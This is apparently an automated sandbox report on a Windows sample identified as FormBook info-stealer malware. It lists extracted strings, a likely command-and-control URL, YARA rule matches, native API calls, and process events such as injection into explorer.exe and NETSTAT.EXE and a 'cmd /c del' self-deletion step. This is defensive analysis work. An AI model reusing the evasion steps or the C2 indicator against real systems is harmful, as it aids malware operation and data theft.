          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnAc
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnUc
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krklJ
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krylx
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.639209828.0000000005542000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coml
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr.kr
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr8l
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krbl
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comicFf
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comicwf
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnue
          Source: NETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmpString found in binary or memory: https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_004181B0 NtCreateFile,4_2_004181B0
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00418260 NtReadFile,4_2_00418260
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_004182E0 NtClose,4_2_004182E0
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00418390 NtAllocateVirtualMemory,4_2_00418390
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_004181AC NtCreateFile,4_2_004181AC
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00418202 NtCreateFile,4_2_00418202
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041840A NtAllocateVirtualMemory,4_2_0041840A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479710 NtQueryInformationToken,LdrInitializeThunk,10_2_03479710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479FE0 NtCreateMutant,LdrInitializeThunk,10_2_03479FE0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479780 NtMapViewOfSection,LdrInitializeThunk,10_2_03479780
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479A50 NtCreateFile,LdrInitializeThunk,10_2_03479A50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479650 NtQueryValueKey,LdrInitializeThunk,10_2_03479650
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_03479660
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034796D0 NtCreateKey,LdrInitializeThunk,10_2_034796D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034796E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_034796E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479540 NtReadFile,LdrInitializeThunk,10_2_03479540
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_03479910
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034795D0 NtClose,LdrInitializeThunk,10_2_034795D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034799A0 NtCreateSection,LdrInitializeThunk,10_2_034799A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479840 NtDelayExecution,LdrInitializeThunk,10_2_03479840
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479860 NtQuerySystemInformation,LdrInitializeThunk,10_2_03479860
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479760 NtOpenProcess,10_2_03479760
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479770 NtSetInformationFile,10_2_03479770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347A770 NtOpenThread,10_2_0347A770
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479B00 NtSetValueKey,10_2_03479B00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347A710 NtOpenProcessToken,10_2_0347A710
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479730 NtQueryVirtualMemory,10_2_03479730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034797A0 NtUnmapViewOfSection,10_2_034797A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347A3B0 NtGetContextThread,10_2_0347A3B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479670 NtQueryInformationProcess,10_2_03479670
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479A00 NtProtectVirtualMemory,10_2_03479A00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479610 NtEnumerateValueKey,10_2_03479610
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479A10 NtQuerySection,10_2_03479A10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479A20 NtResumeThread,10_2_03479A20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479A80 NtOpenDirectoryObject,10_2_03479A80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479950 NtQueueApcThread,10_2_03479950
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479560 NtWriteFile,10_2_03479560
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479520 NtWaitForSingleObject,10_2_03479520
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347AD30 NtSetContextThread,10_2_0347AD30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034799D0 NtCreateProcessEx,10_2_034799D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034795F0 NtQueryInformationFile,10_2_034795F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347B040 NtSuspendThread,10_2_0347B040
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479820 NtEnumerateKey,10_2_03479820
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034798F0 NtReadVirtualMemory,10_2_034798F0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034798A0 NtWriteVirtualMemory,10_2_034798A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_009681B0 NtCreateFile,10_2_009681B0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_009682E0 NtClose,10_2_009682E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00968260 NtReadFile,10_2_00968260
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00968390 NtAllocateVirtualMemory,10_2_00968390
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_009681AC NtCreateFile,10_2_009681AC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00968202 NtCreateFile,10_2_00968202
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096840A NtAllocateVirtualMemory,10_2_0096840A
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041B84A4_2_0041B84A
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_004010304_2_00401030
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00408C4C4_2_00408C4C
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00408C504_2_00408C50
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041B4964_2_0041B496
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041CD524_2_0041CD52
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041C5144_2_0041C514
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041C5274_2_0041C527
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00402D884_2_00402D88
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041CDA74_2_0041CDA7
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041CE794_2_0041CE79
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041BE0B4_2_0041BE0B
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041CF314_2_0041CF31
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0049BF7F4_2_0049BF7F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346EBB010_2_0346EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03456E3010_2_03456E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03501D5510_2_03501D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343F90010_2_0343F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03430D2010_2_03430D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0345412010_2_03454120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344D5E010_2_0344D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346258110_2_03462581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F100210_2_034F1002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344841F10_2_0344841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B09010_2_0344B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096B49610_2_0096B496
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00958C5010_2_00958C50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00958C4C10_2_00958C4C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00952D9010_2_00952D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00952D8810_2_00952D88
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096CDA710_2_0096CDA7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096C51410_2_0096C514
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096C52710_2_0096C527
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096CD5210_2_0096CD52
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096CE7910_2_0096CE79
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00952FB010_2_00952FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096CF3110_2_0096CF31
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0343B150 appears 32 times
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000000.636900304.0000000000102000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFixedBufferAttribu.exe8 vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exeBinary or memory string: OriginalFilename vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exe, 00000004.00000003.697053653.0000000000DD6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exe, 00000004.00000000.696683735.0000000000492000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFixedBufferAttribu.exe8 vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exeBinary or memory string: OriginalFilenameFixedBufferAttribu.exe8 vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: NQBNpLezqZKv1P4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: NQBNpLezqZKv1P4.exe, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.0.NQBNpLezqZKv1P4.exe.100000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.0.NQBNpLezqZKv1P4.exe.490000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.2.NQBNpLezqZKv1P4.exe.490000.1.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@7/6
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NQBNpLezqZKv1P4.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
          Source: NQBNpLezqZKv1P4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'Jump to behavior
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: NQBNpLezqZKv1P4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: NQBNpLezqZKv1P4.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041522D push esi; retf 4_2_00415240
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041B3F2 push eax; ret 4_2_0041B3F8
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041B3FB push eax; ret 4_2_0041B462
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041B3A5 push eax; ret 4_2_0041B3F8
